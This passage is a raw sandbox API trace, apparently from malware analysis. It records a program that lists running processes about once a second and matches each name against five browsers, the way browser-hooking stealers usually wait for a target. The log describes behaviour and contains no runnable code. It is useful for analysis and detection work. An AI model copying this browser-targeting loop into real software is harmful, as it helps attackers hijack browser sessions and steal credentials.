(lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0236.003] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0236.003] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0236.003] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0236.004] CloseHandle (hObject=0xe8) returned 1 [0236.004] Sleep (dwMilliseconds=0x3e8) [0237.044] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0237.046] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.047] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0237.047] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0237.047] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0237.047] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0237.047] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0237.047] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0237.048] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0237.048] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0237.048] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0237.048] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0237.048] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0237.048] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0237.048] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0237.048] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0237.048] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0237.048] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0237.048] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.048] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0237.049] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0237.049] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0237.049] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0237.049] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0237.049] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.049] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0237.049] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0237.049] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0237.049] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0237.049] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0237.049] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.049] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0237.050] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0237.050] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0237.050] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0237.050] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0237.050] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.050] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0237.051] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0237.051] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0237.051] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0237.051] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0237.051] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.051] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0237.051] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0237.051] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0237.051] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0237.051] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0237.051] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.051] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0237.052] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0237.052] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0237.052] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0237.052] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0237.052] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.052] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0237.052] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0237.052] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0237.052] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0237.052] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0237.052] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.052] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.053] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0237.053] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0237.053] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0237.053] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0237.053] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.053] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.054] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0237.054] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0237.054] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0237.054] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0237.054] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.054] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.054] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0237.054] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0237.054] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0237.054] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0237.054] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.054] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.055] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0237.055] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0237.055] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0237.055] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0237.055] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.055] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.055] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0237.055] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0237.055] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0237.055] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0237.055] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.055] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0237.056] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0237.056] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0237.056] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0237.056] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0237.056] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.056] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.057] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0237.057] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0237.057] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0237.057] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0237.057] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.057] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.057] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0237.057] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0237.057] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0237.057] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0237.057] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.057] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0237.058] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0237.058] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0237.058] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0237.058] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0237.058] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.058] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0237.058] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0237.058] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0237.058] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0237.058] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0237.058] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.059] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0237.059] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0237.059] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0237.059] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0237.059] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0237.059] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.059] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.060] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0237.060] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0237.060] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0237.060] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0237.060] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.060] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0237.060] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0237.060] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0237.060] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0237.060] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0237.060] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.060] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0237.061] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0237.061] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0237.061] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0237.061] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0237.061] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.061] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0237.061] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0237.061] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0237.061] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0237.061] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0237.062] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.062] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0237.062] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0237.062] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0237.062] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0237.062] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0237.062] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.062] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0237.063] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0237.063] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0237.063] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0237.063] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0237.063] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.063] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0237.063] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0237.063] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0237.063] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0237.063] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0237.063] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.063] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0237.064] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0237.064] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0237.064] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0237.064] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0237.064] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.064] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0237.064] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0237.064] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0237.064] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0237.065] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0237.065] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.065] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0237.065] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0237.065] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0237.065] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0237.065] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0237.065] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.065] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0237.066] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0237.066] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0237.066] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0237.066] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0237.066] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.066] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0237.066] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0237.066] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0237.066] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0237.066] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0237.066] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.066] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0237.067] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0237.067] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0237.067] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0237.067] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0237.067] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.067] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0237.067] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0237.067] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0237.067] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0237.068] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0237.068] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.068] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0237.068] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0237.068] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0237.068] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0237.068] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0237.068] lstrcmpiA 